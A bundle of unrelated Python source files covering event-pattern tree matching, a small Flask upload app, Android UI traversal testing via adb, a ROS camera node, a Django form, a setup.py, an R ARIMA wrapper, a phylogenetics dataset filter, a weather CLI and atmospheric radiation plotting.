super().__init__(sliding_window, parent)
self._event_defs = event_defs
self._left_subtree = left
self._right_subtree = right
def get_leaves(self):
result = []
if self._left_subtree is not None:
result += self._left_subtree.get_leaves()
if self._right_subtree is not None:
result += self._right_subtree.get_leaves()
return result
def apply_formula(self, formula: Formula):
names = {item[1].name for item in self._event_defs}
condition = formula.get_formula_of(names)
self._condition = condition if condition else TrueFormula()
self._left_subtree.apply_formula(self._condition)
self._right_subtree.apply_formula(self._condition)
def get_event_definitions(self):
return self._event_defs
def _set_event_definitions(self,
left_event_defs: List[Tuple[int, QItem]], right_event_defs: List[Tuple[int, QItem]]):
"""
A helper function for collecting the event definitions from subtrees. To be overridden by subclasses.
"""
self._event_defs = left_event_defs + right_event_defs
def set_subtrees(self, left: Node, right: Node):
"""
Sets the subtrees of this node.
"""
self._left_subtree = left
self._right_subtree = right
self._set_event_definitions(self._left_subtree.get_event_definitions(),
self._right_subtree.get_event_definitions())
def handle_new_partial_match(self, partial_match_source: Node):
"""
Internal node's update for a new partial match in one of the subtrees.
"""
if partial_match_source == self._left_subtree:
other_subtree = self._right_subtree
elif partial_match_source == self._right_subtree:
other_subtree = self._left_subtree
else:
raise Exception() # should never happen
new_partial_match = partial_match_source.get_last_unhandled_partial_match()
new_pm_key = partial_match_source._partial_matches.get_key()
first_event_defs = partial_match_source.get_event_definitions()
other_subtree.clean_expired_partial_matches(new_partial_match.last_timestamp)
partial_matches_to_compare = other_subtree.get_partial_matches(new_pm_key(new_partial_match))
second_event_defs = other_subtree.get_event_definitions()
self.clean_expired_partial_matches(new_partial_match.last_timestamp)
# given a partial match from one subtree, for each partial match
# in the other subtree we check for new partial matches in this node.
for partialMatch in partial_matches_to_compare:
self._try_create_new_match(new_partial_match, partialMatch, first_event_defs, second_event_defs)
def _try_create_new_match(self,
first_partial_match: PartialMatch, second_partial_match: PartialMatch,
first_event_defs: List[Tuple[int, QItem]], second_event_defs: List[Tuple[int, QItem]]):
"""
Verifies all the conditions for creating a new partial match and creates it if all constraints are satisfied.
"""
# We need this because clean_expired doesn't necessarily clean old partial matches.
if self._sliding_window != timedelta.max and (
abs(first_partial_match.last_timestamp - second_partial_match.first_timestamp) > self._sliding_window
or abs(first_partial_match.first_timestamp - second_partial_match.last_timestamp) > self._sliding_window
):
return
events_for_new_match = self._merge_events_for_new_match(first_event_defs, second_event_defs,
first_partial_match.events, second_partial_match.events)
# events merged
if not self._validate_new_match(events_for_new_match):
return
self.add_partial_match(PartialMatch(events_for_new_match))
if self._parent is not None:
self._parent.handle_new_partial_match(self)
def _merge_events_for_new_match(self,
first_event_defs: List[Tuple[int, QItem]],
second_event_defs: List[Tuple[int, QItem]],
first_event_list: List[Event],
second_event_list: List[Event]):
"""
Creates a list of events to be included in a new partial match.
"""
if self._event_defs[0][0] == first_event_defs[0][0]:
return first_event_list + second_event_list
if self._event_defs[0][0] == second_event_defs[0][0]:
return second_event_list + first_event_list
raise Exception()
def _validate_new_match(self, events_for_new_match: List[Event]):
"""
Validates the condition stored in this node on the given set of events.
"""
binding = {
self._event_defs[i][1].name: events_for_new_match[i].payload for i in range(len(self._event_defs))
}
return self._condition.eval(binding)
class AndNode(InternalNode):
"""
An internal node representing an "AND" operator.
"""
def create_storage_unit(self, storage_params: TreeStorageParameters, sorting_key: callable = None,
relation_op=None, equation_side=None, sort_by_first_timestamp=False):
if storage_params is None or not storage_params.sort_storage:
self._partial_matches = DefaultStorage()
self._left_subtree.create_storage_unit(storage_params)
self._right_subtree.create_storage_unit(storage_params)
return
if sorting_key is None:
self._partial_matches = UnsortedStorage(storage_params.clean_expired_every)
else:
self._partial_matches = SortedStorage(
sorting_key, relation_op, equation_side, storage_params.clean_expired_every
)
left_sorting_key = None
right_sorting_key = None
relop = None
left_event_defs = self._left_subtree.get_event_definitions()
right_event_defs = self._right_subtree.get_event_definitions()
left_event_names = {item[1].name for item in left_event_defs}
right_event_names = {item[1].name for item in right_event_defs}
if storage_params.attributes_priorities is not None:
simple_formula = self._condition.simplify_formula(
left_event_names, right_event_names, storage_params.attributes_priorities
)
else:
simple_formula = self._condition.simplify_formula(left_event_names, right_event_names)
if simple_formula is not None:
left_term, relop, right_term = simple_formula.dismantle()
left_sorting_key = lambda pm: left_term.eval(
{left_event_defs[i][1].name: pm.events[i].payload for i in range(len(pm.events))}
)
right_sorting_key = lambda pm: right_term.eval(
{right_event_defs[i][1].name: pm.events[i].payload for i in range(len(pm.events))}
)
self._left_subtree.create_storage_unit(storage_params, left_sorting_key, relop, "left")
self._right_subtree.create_storage_unit(storage_params, right_sorting_key, relop, "right")
class SeqNode(InternalNode):
"""
An internal node representing a "SEQ" (sequence) operator.
In addition to checking the time window and condition like the basic node does, SeqNode also verifies the order
of arrival of the events in the partial matches it constructs.
"""
def _set_event_definitions(self,
left_event_defs: List[Tuple[int, QItem]], right_event_defs: List[Tuple[int, QItem]]):
self._event_defs = merge(left_event_defs, right_event_defs, key=lambda x: x[0])
def _merge_events_for_new_match(self,
first_event_defs: List[Tuple[int, QItem]],
second_event_defs: List[Tuple[int, QItem]],
first_event_list: List[Event],
second_event_list: List[Event]):
return merge_according_to(first_event_defs, second_event_defs,
first_event_list, second_event_list, key=lambda x: x[0])
def _validate_new_match(self, events_for_new_match: List[Event]):
if not is_sorted(events_for_new_match, key=lambda x: x.timestamp):
return False
return super()._validate_new_match(events_for_new_match)
def create_storage_unit(self, storage_params: TreeStorageParameters, sorting_key: callable = None,
relation_op=None, equation_side=None, sort_by_first_timestamp=False):
"""
This function creates the storage for partial_matches it gives a special key: callable
to the storage unit which tells the storage unit on which attribute(only timestamps here)
to sort.
We assume all events are in SEQ(,,,,...) which makes the order in partial match the same
as in event_defs: [(1,a),(2,b)] in event_defs and [a,b] in pm.
"""
if storage_params is None or not storage_params.sort_storage:
self._partial_matches = DefaultStorage()
self._left_subtree.create_storage_unit(storage_params)
self._right_subtree.create_storage_unit(storage_params)
return
if sorting_key is None:
self._partial_matches = UnsortedStorage(storage_params.clean_expired_every)
else:
self._partial_matches = SortedStorage(
sorting_key, relation_op, equation_side, storage_params.clean_expired_every, sort_by_first_timestamp
)
left_event_defs = self._left_subtree.get_event_definitions()
right_event_defs = self._right_subtree.get_event_definitions()
# comparing min and max leaf index of two subtrees
min_left = min(left_event_defs, key=lambda x: x[0])[0] # [ { ] } or [ { } ]
max_left = max(left_event_defs, key=lambda x: x[0])[0] # { [ } ] or { [ ] }
min_right = min(right_event_defs, key=lambda x: x[0])[0] # [ ] { }
max_right = max(right_event_defs, key=lambda x: x[0])[0] # { } [ ]
left_sort = 0
right_sort = 0
relop = None
if max_left < min_right: # 3)
left_sort = -1
right_sort = 0
relop = "<="
elif max_right < min_left: # 4)
left_sort = 0
right_sort = -1
relop = ">="
elif min_left < min_right: # 1)
relop = "<="
elif min_right < min_left: # 2)
relop = ">="
assert relop is not None
left_sort_by_first_timestamp = True if left_sort == 0 else False
right_sort_by_first_timestamp = True if right_sort == 0 else False
self._left_subtree.create_storage_unit(
storage_params, lambda pm: pm.events[left_sort].timestamp, relop, "left", left_sort_by_first_timestamp
)
self._right_subtree.create_storage_unit(
storage_params, lambda pm: pm.events[right_sort].timestamp, relop, "right", right_sort_by_first_timestamp
)
|
from flask import Flask,render_template,jsonify,request
from werkzeug import secure_filename
from werkzeug.datastructures import ImmutableMultiDict
import base64
import re
import cv2
import numpy as np
app=Flask(__name__)
def convert_to_diff_text(text):
print(text)
converted_text = 'treek'
return converted_text
@app.route('/')
def func():
return render_template('index.html')
@app.route('/second')
def func_two():
return render_template('second.html')
@app.route('/text_text')
def func_three():
return render_template('text_text.html')
@app.route('/image_speech')
def func_four():
return render_template('image_speech.html')
@app.route('/static/<path:path>')
def send_js(path):
return send_from_directory('static', path)
@app.route('/api/text_text', methods = ['GET'])
def convert_text_to_text():
args = request.args
parsed_data = args.to_dict(flat=False)
parsed_data = parsed_data['text'][0]
print(parsed_data)
converted_text = convert_to_diff_text(parsed_data)
return converted_text
@app.route('/fill')
def fill_():
if request.method=='POST':
v=request.form['name'];
file1=open("x.txt","w");
file1.write(v);
return jsonify(data)
@app.route('/uploader', methods = ['POST'])
def upload_file():
if request.method == 'POST':
print("hell")
image_data = request.form.get("data").split(",")[1]
with open("savedimage.png","wb") as fe:
fe.write(base64.b64decode(image_data))
return "saved_image"
if __name__=='__main__':
app.run(debug=True)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import xml.etree.ElementTree as ET
import getWidget
from drawPic import drawPic
from adbExtend import adbExtend
from deviceMonitor import AppPerformanceInfo
from bugDetect import BugDetect
import os, logging, coloredlogs
import time,threading
coloredlogs.install()
# view (activity) structure
class View(object):
def __init__(self, level=0, actName='', topView='', father='', nodes=None):
# self.id = id
self.index = actName+topView
self.level = level
self.actName = actName
self.packgeName = actName.split('/')[0]
self.father = father
self.topView = topView
self.notes = []
# mn = node()
for mn in nodes:
self.notes.append(mn)
def getIndex(self):
return self.index
def getActName(self):
return self.actName
def getPackgaName(self):
return self.packgeName
# Get current frame layout to identify activity and content change.
def getTopView(self):
return self.topView
def getNotes(self):
return self.notes
def getLevel(self):
return self.level
def setFather(self, father):
self.father = father
def setLevel(self, level):
self.level = level
def showView(self,showNodesFlag=False):
logging.info('--------------------- start -----------------------------')
logging.info( 'Current View: %s, level: %d, father: %s, node list as bellow'%(self.actName, self.level, self.father) )
sumNodes = len(self.notes)
travedNode = 0
for mn in self.notes:
if showNodesFlag:
mn.showNode()
if not mn.getStatus():
travedNode = travedNode+1
logging.info('Current Nodes, Sum:%d, Already Traveled: %d'%(sumNodes,travedNode) )
logging.info('---------------------- end ----------------------------')
# node structure
# description for widget on view(activity)
# as node list, involved in view
class Node(object):
def __init__(self, id, bounds='[0,0][0,0]', text='', status=True, type=''):
self.id = id
self.type = type
self.status = status
self.path = id
self.bounds = bounds
self.text = text
self.x0 = int(bounds.split(',')[0].replace('[', ''))
self.y0 = int(bounds.split(',')[1].split('][')[0])
self.x1 = int(bounds.split(',')[1].split('][')[1])
self.y1 = int(bounds.split(',')[2].replace(']', ''))
self.xcenter = (int(self.x0) + int(self.x1))/2
self.ycenter = (int(self.y0) + int(self.y1))/2
def getX0(self):
return self.x0
def getX1(self):
return self.x1
def getY0(self):
return self.y0
def getY1(self):
return self.y1
def getXcenter(self):
return self.xcenter
def getYcenter(self):
return self.ycenter
def getID(self):
return self.id
def getPath(self):
return self.path
def getStatus(self):
return self.status
def getText(self):
return self.text
def setStatus(self, status):
self.status = status
def showNode(self):
logging.info('Current Node %s, bounds: %s, text: %s, status: %s, type: %s'%(self.id, self.bounds,self.text, self.status, self.type))
class viewAnalysis(object):
def getCurrentView(self):
adb = adbExtend()
actName = adb.getCurrentActivityO()
topView = adb.getCurrentTopView()
nodes =self.getNodes()
mView = View(actName=actName, topView=topView, nodes=nodes)
return mView
def getNodes(self):
fileName = 'tmp.xml'
getWidget.activityDump(fileName)
f = open('./'+fileName, 'r')
tree = ET.parse(f)
root = tree.getroot()
mNodes = []
widgetNumber = 1
for child in root.iter('node'):
if 'true' in child.attrib['clickable']:
# print child.attrib
try:
# print '----childrens----'
mBounds = child.attrib.get('bounds')
mClass = child.attrib.get('class')
# print 'bounds:' + str(mBounds)
# print 'class' + str(mClass)
mNode = Node(widgetNumber,mBounds,type=mClass)
mNodes.append(mNode)
widgetNumber = widgetNumber + 1
except Exception, e:
logging.error( Exception, ":", e)
return mNodes
def drawView(self, mView):
dpic = drawPic()
picFile = mView.getActName().split('.')[-1]
picFile = picFile+ '.jpeg'
logging.info ('Draw view as file: %s'%picFile)
adb = adbExtend()
[xmax, ymax] = adb.get_resolution()
dpic.createPic(int(xmax), int(ymax), picFile)
adb.getSnapshot(picFile)
for mn in mView.getNotes():
x0 = mn.getX0()
y0 = mn.getY0()
x1 = mn.getY1()
y1 = mn.getY1()
xcenter = mn.getXcenter()
ycenter = mn.getYcenter()
mText = mn.getText()
mID = mn.getID()
dpic.drawRec(x0,y0,x1,y1, picFile)
dpic.drawText(x0,y0, mText, picFile)
dpic.drawText(xcenter, ycenter, str(mID), picFile)
# for test, show all wighet of current activity
def phaseXML(self, fileName):
getWidget.activityDump(fileName)
f = open('./'+fileName, 'r')
tree = ET.parse(f)
root = tree.getroot()
logging.info('root.tag =', root.tag)
logging.info('root.attrib =', root.attrib)
miniSize = 0
miniNode = None
dpic = drawPic()
picFile = 'activity.jpeg'
adb = adbExtend()
[xmax, ymax] = adb.get_resolution()
dpic.createPic(int(xmax), int(ymax), picFile)
widgetNumber = 1
for child in root.iter('node'):
logging.info( '------- ×××××××××××××××××××××××××××××××× -------')
# print (child.tag)
# print (child.attrib)
if 'true' in child.attrib['clickable']:
logging.info( child.attrib)
logging.info( '----childrens----')
bounds = child.attrib.get('bounds')
mClass = child.attrib.get('class')
logging.info( 'bounds:' + str(bounds))
logging.info( 'class:' + str(mClass))
try:
x0 = bounds.split(',')[0].replace('[', '')
y0 = bounds.split(',')[1].split('][')[0]
x1 = bounds.split(',')[1].split('][')[1]
y1 = bounds.split(',')[2].replace(']', '')
dpic.drawRec(int(x0), int(y0), int(x1), int(y1), picFile)
dpic.drawText(int(x0), int(y0), child.attrib.get('text'), picFile)
xcenter = (int(x0) + int(x1))/2
ycenter = (int(y0) + int(y1))/2
dpic.drawText(int(xcenter), int(ycenter), str(widgetNumber), picFile)
widgetNumber = widgetNumber+1
# dpic.drawText(int(x0), int(y0)+40, child.attrib.get('resource-id'), picFile)
except Exception, e:
logging.error(Exception, ":", e)
else:
logging.info( 'current widget unclickable')
logging.info( child.attrib)
logging.info( '----childrens----')
bounds = child.attrib.get('bounds')
logging.info( 'bounds:' + str(bounds))
try:
x0 = bounds.split(',')[0].replace('[', '')
y0 = bounds.split(',')[1].split('][')[0]
x1 = bounds.split(',')[1].split('][')[1]
y1 = bounds.split(',')[2].replace(']', '')
dpic.drawRec(int(x0), int(y0), int(x1), int(y1), picFile, col='blue')
# dpic.drawText(int(x0), int(y0)+40, child.attrib.get('resource-id'), picFile)
except Exception, e:
logging.error( Exception, ":", e)
class viewTree(object):
def __init__(self):
self.mViewList = []
# rootFile = '/home/john/test'
def addView(self, mView):
self.mViewList.append(mView)
def findView(self, viewIndex):
mView = None
for mV in self.mViewList:
if mV.getIndex() == viewIndex:
mView = mV
break
return mView
def checkViewExist(self, mView):
viewExistFlag = False
for mV in self.mViewList:
if mV.getIndex() == mView.getIndex():
viewExistFlag = True
break;
return viewExistFlag
class viewTraversal(object):
def __init__(self, maxLevel = 3):
self.maxLevel = maxLevel
self.mViewTree = viewTree()
def mutiLuanchApp(self, activityName, packageName, times):
for i in range(times):
adbExtend().stopActivity(packageName)
time.sleep(1)
adbExtend().startActivity(activityName)
time.sleep(1)
def startTravelView(self):
level = 1
# adb = adbExtend()
viewAna = viewAnalysis()
self.rootView = viewAna.getCurrentView()
self.rootView.setFather('ROOT')
self.rootView.setLevel(level)
self.rootView.showView()
self.mutiLuanchApp(self.rootView.getActName(), self.rootView.getPackgaName(), 3)
self.travelCurrentView(self.rootView)
adbExtend().monkeyTest(self.rootView.getPackgaName(), 1000)
def travelCurrentView(self, mView):
# check current view is a new view or not
# if yes, add the newview to view list, then start to travel it
# if not, replace the view with old view in view list, continue to travel it
if self.mViewTree.checkViewExist(mView):
viewIndex = mView.getIndex()
mView = self.mViewTree.findView(viewIndex)
logging.info( '***** --- current view existed, replace it with old view in view list')
logging.info( 'view name %s'%mView.getActName())
# mView.showView()
else:
self.mViewTree.addView(mView)
currentLevel = mView.getLevel()
if currentLevel > self.maxLevel:
logging.info( 'current level is bigger than max level, current test stop')
logging.info( 'current level: %d, max level: %d'%(currentLevel, self.maxLevel))
return
else:
logging.info( 'level match, continue testing ')
rootAct = self.rootView.getActName()
rootPackage = self.rootView.getPackgaName()
currentAct = mView.getActName()
currentView = mView.getTopView()
for mNode in mView.getNotes():
# set node status to false, that means the node has been touched(traveled) already
if mNode.getStatus():
mNode.setStatus(False)
actName = adbExtend().getCurrentActivityO()
viewName = adbExtend().getCurrentTopView()
if not rootPackage==actName.split('/')[0]:
adbExtend().startActivity(rootAct)
return
self.enterSan(mNode)
# compare new view and old view with activity and topview.
# activity not match, means view changed
logging.info( '-------->Activity name: ' + actName)
if not(currentAct == actName):
logging.info( '**** Activity not compared******************')
logging.info( 'old: ' + currentAct)
logging.info( 'new: ' + actName)
sanView = viewAnalysis().getCurrentView()
sanView.setLevel(currentLevel+1)
sanView.setFather(currentAct)
self.travelCurrentView(sanView)
# self.backKey()
# activity match but top view not match, means content changed, also assert as a new view
elif not(currentView == viewName):
logging.info( '**** Activity compare ***********************')
logging.info( '**** **** TopView not compared******************')
logging.info( 'old: ' + currentView)
logging.info( 'new: ' + viewName)
# self.backKey()
sanView = viewAnalysis().getCurrentView()
sanView.setLevel(currentLevel+1)
sanView.setFather(currentAct)
self.travelCurrentView(sanView)
mView.showView()
self.backKey()
def backKey(self):
logging.info( '--------> back to father view')
adbExtend().call_adb('shell input keyevent KEYCODE_BACK')
def enterSan(self, sunNode):
# mpth = sunNode.getPath()
logging.info( 'Enter san--------')
xcenter = sunNode.getXcenter()
ycenter = sunNode.getYcenter()
adbExtend().touchEvent(xcenter, ycenter)
time.sleep(1)
# def startTraversalFolder(self, dir, level=0, father='ROOT'):
# # print 'startTraversal'
#
# level = level + 1
# # print 'level: %d, node: %s'%(level, dir)
# filelist = os.listdir(dir)
# mNodes = []
#
# for mnID in filelist:
# mNode = Node(mnID, 'false','folder')
# mNodes.append(mNode)
# self.enterSan(mNode)
#
# mView = View(level,dir, father, mNodes)
# mView.showView()
#
# for i in filelist:
# fullfile = os.path.join(dir, i)
# if not os.path.isdir(fullfile):
# print 'level: %d, leaf: %s'%(level, fullfile)
# else:
# self.startTraversalFolder(fullfile, level,dir)
if __name__ == '__main__':
beforeTime = time.time()
# Prepare for device monitor
activityName = adbExtend().getCurrentActivityN()
packageName = activityName.split('/')[0]
devicePerf = AppPerformanceInfo(packageName)
# Prepare for bug detach
bugDetach = BugDetach()
# set thread for monitor
threads = []
t1 = threading.Thread(target=devicePerf.getResourceInfo)
threads.append(t1)
t2 = threading.Thread(target=devicePerf.get_activityLuanchTime)
threads.append(t2)
# bug detach thread
t3 = threading.Thread(target=bugDetach.logcatGet)
threads.append(t3)
t4 = threading.Thread(target=bugDetach.updateAndDetach)
threads.append(t4)
# start device monitor thread
for t in threads:
t.setDaemon(True)
t.start()
# t.join()
# activity travel test thread
mViewTravs = viewTraversal(maxLevel=3)
mViewTravs.startTravelView()
# stop device monitor and bug detach
devicePerf.setRunningFlag(False)
bugDetach.setRunningFlag(False)
logging.info( '----------- show some result ----------------')
devicePerf.showLaunchInfo()
devicePerf.showKPIInfo()
afterTime = time.time()
logging.info( time.strftime('Excute Time: %d s'%(afterTime-beforeTime)))
|
#!/usr/bin/env python
'''
**********************************************************************
* Filename : camIncoming.py
* Description : receives the message for an image and processes it.
* Author : Joe Kocsis
* E-mail : Joe.Kocsis3@gmail.com
* Website : www.github.com/jkocsis3/tanis
**********************************************************************
'''
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import os
class CamIncoming():
_DEBUG = True
_DEBUG_INFO = 'DEBUG "camIncoming.py":'
def __init__(self, debug=False):
self._DEBUG = debug
rospy.loginfo(self._DEBUG_INFO + "Initiating Node")
rospy.init_node("cam incoming node")
self.bridge = CvBridge()
self.counter = 0
self.image_msg = rospy.Subscriber("/angela/cameras/main/capture", Image, self.SaveImage)
# stops the node from exiting
rospy.spin()
def SaveImage(self, data):
if self._DEBUG:
rospy.loginfo(self._DEBUG_INFO + "Saving Image")
try:
cv_image = self.bridge.imgmsg_to_cv2(data, desired_encoding="rgb8")
except CvBridgeError as e:
rospy.logerr(self._DEBUG_INFO)
rospy.logerr(e)
return
savePath = os.path.join('/home/pi/tanis/Images/', (str(self.counter) + '.jpg'))
# savePath = "/images/" + (str(self.counter) + '.jpg')
# (filepath, filename) = os.path.split(savePath)
# print(filepath)
# print(filename)
cv2.imwrite(savePath, cv_image)
if self._DEBUG:
rospy.loginfo(self._DEBUG_INFO + "Image Saved")
self.counter += 1
if __name__ == '__main__':
CamIncoming()
|
from .models import StuData
from django import forms
class StuForm(forms.ModelForm):
class Meta:
model=StuData
fields=["name","score","type"]
def clean(self,*args,**kwargs):
data=self.cleaned_data
f=["name","score","type"]
for i in f:
var1=data.get(i,None)
if var1=='' or var1==None:
raise forms.ValidationError("Name Cannot be empty")
return False
break
else:
return super().clean(*args,**kwargs)
|
from distutils.core import setup
setup(
name='easygl',
version='0.1.0a1',
packages=['easygl', 'easygl.arrays', 'easygl.display', 'easygl.prefabs', 'easygl.shaders', 'easygl.textures',
'easygl.structures'],
url='https://github.com/overdev/easygl-0.1.0-alpha1',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programmin Language :: Python :: 3.4',
],
setup_requires=['pygame', 'PyOpenGL', 'typing'],
keywords='games easygl opengl gl graphics textures geometry rendering gamedev pygame PyOpenGL',
author='Jorge A. G.',
author_email='jorgegomes83@hotmail.com',
description='A small library for easy OpenGL 2D rendering.'
)
|
import numpy as np
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects.packages import importr
stats = importr('stats')
# x : np.ndarray
# ar_order : int
# ma_order : int
# diff_order : int
# -> (np.ndarray, np.ndarray, float, int)
def arima_r(x, ar_order, ma_order, diff_order):
fit = stats.arima(x, order=np.array([ar_order, diff_order, ma_order]), method='ML')
return np.array(fit.rx2('coef')), np.array(fit.rx2('residuals')), np.array(fit.rx2('aic'))[0], np.array(fit.rx2('nobs'))[0]
|
import sys
import os
import shutil
import random
import glob
sys.path.insert(0, 'scripts')
sys.path.insert(0, 'tools/families')
sys.path.insert(0, 'tools/database')
import experiments as exp
import fam
from find_diff_datasets_julia import get_diff_and_propmax
def get_ali_from_logs(logfile):
lines = open(logfile).readlines()
for line in lines:
if ("Reading alignment from file" in line):
return line.split(":")[-1].strip()
def get_nt_from_logs(logfile):
lines = open(logfile).readlines()
for line in lines:
if ("Loaded alignment with" in line):
sp = line.split()
print(sp[4] + " " +sp[7])
return int(sp[4]) * int(sp[7])
return 0
def generate(inputdir, prefix, min_var, max_propmax, max_fam, max_nt, seed):
random.seed(seed)
outputdir = "diff" + prefix
outputdir += "_var" + str(min_var)
outputdir += "_propmax" + str(max_propmax)
if (max_fam > 0):
outputdir += "_fam" + str(max_fam)
outputdir += "_nt" + str(max_nt)
outputdir += "_seed" + str(seed)
outputdir = fam.get_datadir(outputdir)
fam.init_top_directories(outputdir)
all_families = os.listdir(inputdir)
all_families.sort()
random.shuffle(all_families)
print("Total number of families " + str(len(all_families)))
families = []
index = 0
for family in all_families:
index += 1
famdir = os.path.join(inputdir, family)
if (not os.path.isfile(os.path.join(famdir, "data.sqlite3"))):
continue
raxmldir = os.path.join(inputdir, family, "output_files", "raxmlng", "evaluation")
pat = os.path.join(raxmldir, "*raxml.log")
print(pat)
anylog = None
try:
anylog = glob.glob(pat)[0]
except:
continue
bases = get_nt_from_logs(anylog)
print(bases)
if (bases > max_nt):
continue
t = None
try:
t = get_diff_and_propmax(famdir)
except:
continue
print(t)
var = t[0]
propmax = t[1]
if (var >= min_var and propmax <= max_propmax):
families.append(family)
print("*********************")
print("Add " + family + " " + str(len(families)))
print(" after " + str(index) + " iterations")
if (max_fam > 0 and len(families) >= max_fam):
break
for family in families:
fam.init_family_directories(outputdir, family)
raxmldir = os.path.join(inputdir, family, "output_files", "raxmlng", "evaluation")
pat = os.path.join(raxmldir, "*raxml.log")
anylog = glob.glob(pat)[0]
ali = get_ali_from_logs(anylog)
shutil.copy(ali, fam.get_alignment(outputdir, family))
trees = glob.glob(os.path.join(raxmldir, "*.bestTree"))
print(len(trees))
with open(fam.get_raxml_multiple_trees(outputdir, "GTR+G", family, 100), "w") as writer:
for tree in trees:
writer.write(open(tree).read())
#fam.postprocess_datadir(outputdir)
if (__name__ == "__main__"):
if (len(sys.argv) < 7):
print("Syntax: python " + os.path.basename(__file__) + " inputdir prefix min_var max_propmax max_families max_bases seed")
exit(1)
inputdir = sys.argv[1]
prefix = sys.argv[2]
min_var = float(sys.argv[3])
max_propmax = float(sys.argv[4])
max_fam = int(sys.argv[5])
max_nt = int(sys.argv[6])
seed = int(sys.argv[7])
generate(inputdir, prefix, min_var, max_propmax, max_fam, max_nt, seed)
|
#!/usr/bin/env python
import weather
from geopy.geocoders import Nominatim
import sys, getopt
import mytime
# User should be able to type:
# weather [weather for current date/location]
# weather on [date]
# weather in [location]
# weather [tomorrow]
# weather on [date] in [location]
# weather in [location] on [date]
def main(argv):
try:
opts, args = getopt.getopt(argv, "hV")
except getopt.GetoptError:
print "weather [-l location] [-d date]"
sys.exit(2)
# parse out the command line options
report = ""
verbose = 1
if len(args) == 0:
#print "Current date/location"
weather_time = mytime.now()
report = weather.digest(weather.local_conditions(weather_time))
elif len(args) == 1 and args[0] == "tomorrow":
weather_time = mytime.tomorrow()
report = weather.digest(weather.local_conditions(weather_time))
elif len(args) == 2 and args[0] == "on":
weather_time = mytime.datetime_from_string(args[1], 1)
report = weather.digest(weather.local_conditions(weather_time))
elif len(args) == 2 and args[0] == "in":
geolocator = Nominatim()
location = geolocator.geocode(args[1])
weather_time = mytime.now()
report = weather.digest(weather.conditions(location.latitude, location.longitude, weather_time))
weather_location = location.address
elif len(args) == 3 and args[0] == "tomorrow":
weather_time = mytime.tomorrow()
geolocator = Nominatim()
location = geolocator.geocode(args[2])
report = weather.digest(weather.conditions(location.latitude, location.longitude, weather_time))
weather_location = location.address
print "Specific date (tomorrow)/specific location"
elif len(args) == 4:
if (args[0] == "on"):
weather_time = mytime.datetime_from_string(args[1], 1)
geolocator = Nominatim()
location = geolocator.geocode(args[3])
report = weather.digest(weather.conditions(location.latitude, location.longitude, weather_time))
weather_location = location.address
elif (args[0] == "in"):
# Start with location
weather_time = mytime.datetime_from_string(args[3], 3)
geolocator = Nominatim()
location = geolocator.geocode(args[1])
report = weather.digest(weather.conditions(location.latitude, location.longitude, weather_time))
weather_location = location.address
else:
print "Error!"
else:
print "Error!"
for opt, arg in opts:
if opt == '-V':
verbose = 0
if verbose == 1:
try:
location_header = "Weather for " + weather_location
except:
location_header = "Weather for current location"
print location_header
print mytime.dt_format(weather_time, 'header')
print "=" * len(location_header)
print report
#print weather.digest(weather.local_conditions(mytime.tomorrow()))
if __name__ == "__main__":
main(sys.argv[1:])
|
import numpy as np
from netCDF4 import Dataset, num2date # to work with NetCDF files
from os.path import expanduser
import matplotlib.pyplot as plt
home = expanduser("~") # Get users home directory
import statsmodels.api as sm
from scipy import stats
import xarray as xr
import pytz
import glob, os
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime
from dateutil import tz
import metpy.calc as mpcalc
from metpy.units import units
import pandas as pd
import seaborn as sns
import matplotlib.ticker as ticker
import matplotlib.colors as colors
import matplotlib.cm as cmx
matplotlib.rcParams.update({'font.size': 24})
#Directory where sondes are stored
#dir_profile = "/media/ludo/DATA/google-drive/Thèse/EUREC4a/github/Input/Products/"
#path_to_sonde_profiles = os.path.join(dir_profile,"rad_profiles_all_sondes_ERA.nc")
dir_profile = "../output/rad_profiles"
path_to_sonde_profiles = os.path.join(dir_profile,"rad_profiles.nc")
sonde_profiles = xr.open_dataset(path_to_sonde_profiles)
def get_variables_to_plot(profiles):
#get only some coordinates of the original xarray
data = profiles["q_rad"]
data["q_rad_lw"] = profiles["q_rad_lw"]
data["q_rad_sw"] = profiles["q_rad_sw"]
data["time"] = profiles["launch_time"]
data = data.drop_vars(["lay","col"])
data = data.to_dataframe()
data["time"] = data["time"].dt.tz_localize(pytz.UTC).dt.tz_convert('America/Barbados').dt.strftime("%H:%M")
data["time"] = pd.to_datetime(data["time"], format="%H:%M")
data = data.reset_index()
data = data.set_index(["time","zlay"])
data = data.groupby([pd.Grouper(freq='10min', level='time'),
pd.Grouper(level='zlay')]).mean()
#come back to xarray and get q_rad
data = data.to_xarray()
time = data.time.values
zlay = data.zlay.values
#fill values with 0 in a new array
ini = np.datetime64('1900-01-01 00:00:00')
end = ini + np.timedelta64(24,'h')
count_time = np.arange(ini, end, np.timedelta64(10, 'm'))
q_rad = np.zeros((len(count_time), len(zlay)))
q_rad_sw = np.zeros((len(count_time), len(zlay)))
q_rad_lw = np.zeros((len(count_time), len(zlay)))
ds = xr.Dataset({'q_rad': (['count_time', 'zlay'], q_rad),
'q_rad_sw': (['count_time', 'zlay'], q_rad_sw),
'q_rad_lw': (['count_time', 'zlay'], q_rad_lw)},
coords={"count_time": count_time, "zlay": zlay})
array = ds.to_dataframe()
for itime in time:
for izlay in zlay:
array.q_rad.loc[itime, izlay] = data["q_rad"].sel(time=itime).sel(zlay=izlay).values
array.q_rad_lw.loc[itime, izlay] = data["q_rad_lw"].sel(time=itime).sel(zlay=izlay).values
array.q_rad_sw.loc[itime, izlay] = data["q_rad_sw"].sel(time=itime).sel(zlay=izlay).values
data = array.to_xarray()
q_rad = np.transpose(data.q_rad.values)
q_rad_lw = np.transpose(data.q_rad_lw.values)
q_rad_sw = np.transpose(data.q_rad_sw.values)
zlay = data.zlay.values
time = data.count_time.values
return time, zlay, q_rad, q_rad_lw, q_rad_sw
def plot_diurnal_cycle(profiles):
time, zlay, q_rad, q_rad_lw, q_rad_sw = get_variables_to_plot(profiles)
dates_list = [date for date in time]
fig, ax = plt.subplots(1,3,figsize=(20,10))
ax[0].set_title(r'Shortwave')
ax[0].set_ylabel('Altitude (km)')
ax[1].set_title('Longwave')
ax[1].set_xlabel('Time (Local)')
ax[2].set_title(r'Net')
ymin=0
